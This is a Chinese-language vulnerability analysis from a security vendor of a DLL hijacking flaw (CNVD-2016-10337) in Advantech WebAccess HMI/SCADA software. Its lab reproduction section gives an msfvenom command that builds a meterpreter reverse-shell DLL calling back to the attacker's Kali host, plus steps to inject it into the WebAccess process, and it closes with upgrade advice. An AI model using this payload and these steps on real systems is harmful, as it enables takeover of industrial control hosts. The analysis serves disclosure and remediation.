CNVD-2016-10337:研华HMI/SCADA软件webaccess dll劫持漏洞分析

CNVD-2016-10337:研华HMI/SCADA软件webaccess dll劫持漏洞分析

时间:2022-03-23 作者:安帝科技

Part1 漏洞状态

Part2 漏洞描述

AdvantechWebAccess是中国台湾研华(Advantech)公司的一套基于浏览器架构的HMI/SCADA软件。该软件支持动态图形显示和实时数据控制,并提供远程控制和管理自动化设备的功能。Advantech HMI/SCADA软件webaccess7.2/8.0/8.1存在4个dll hijack漏洞,当bwopctool.dll,bwabout.dll,BwPAlarm.dll,Webvsid.dll自动加载时,Webvrpcs.exe不会校验这些dll,攻击者可以放置恶意的dll文件在该进程的目录中,对系统进行攻击。

Part3 漏洞复现

1. 实验环境
渗透主机:Kali(192.168.33.129)
目标主机:windowsxp sp3 (192.168.33.138)
软件版本:Advantech WebAccess 8.0
2. 涉及工具
ProcessExplorer(procexp)
DLL-hijacking
metasploit
3. 复现步骤
第一步:寻找可劫持进程WebaccessExpress.exe的DLL
开启进程WebaccessExpress.exe(即Advantech HMI/SCADA软件,在安装目录下可以找到该执行文件),打开procexp。其实两者无关先后。在procexp下可以看到WebaccessExpress.exe进程,如下图所示:

与注册表相对比:

发现bwabout.dll、BwPAlarm.dll等都满足dll劫持的要求,此次选择bwabout.dll。
第二步:利用msf基于dll劫持实现反弹shell
进入kali,检查msfvenom是否正常(在命令行中输入msfvenom)。若正常,则在命令行键入:
msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=5555 -f dll>/root/bwabout.dll


之后,会在root下生成需要的bwabout.dll文件,将该文件拷贝到靶机(XP)的桌面。
在Kali命令行中输入msfconsole开启msf,利用msf中的handler模块开启监听:
在靶机中开启进程WebaccessExpress.exe,利用Dllinject.exe,将bwabout.dll注入到进程。这里对bwabout.dll和Dllinject.exe的位置也有要求,将bwabout.dll放在桌面,Dllinject.exe放在其他目录下。

找到WebaccessExpress进程,点击注入,注入时要选择bwabout.dll所在位置,其他不用填。回到Kali,发现已经可以获取服务器权限了。

需要说明的是实际情况下dll劫持能够成功需要一些前提条件,比如需要将恶意dll脚本植入到靶机中并能够成功执行,为了达到这个条件需要利用其他漏洞或方法。

Part4 漏洞修复

将软件升级至8.2或以上版本或者安装补丁文件。
相关链接:https://www.cnvd.org.cn/flaw/show/CNVD-2016-10337

————————————————-
获取更多情报
联系我们,获取更多漏洞情报详情及处置建议,让企业远离漏洞威胁。
电话:18511745601
邮箱:shiliangang@andisec.com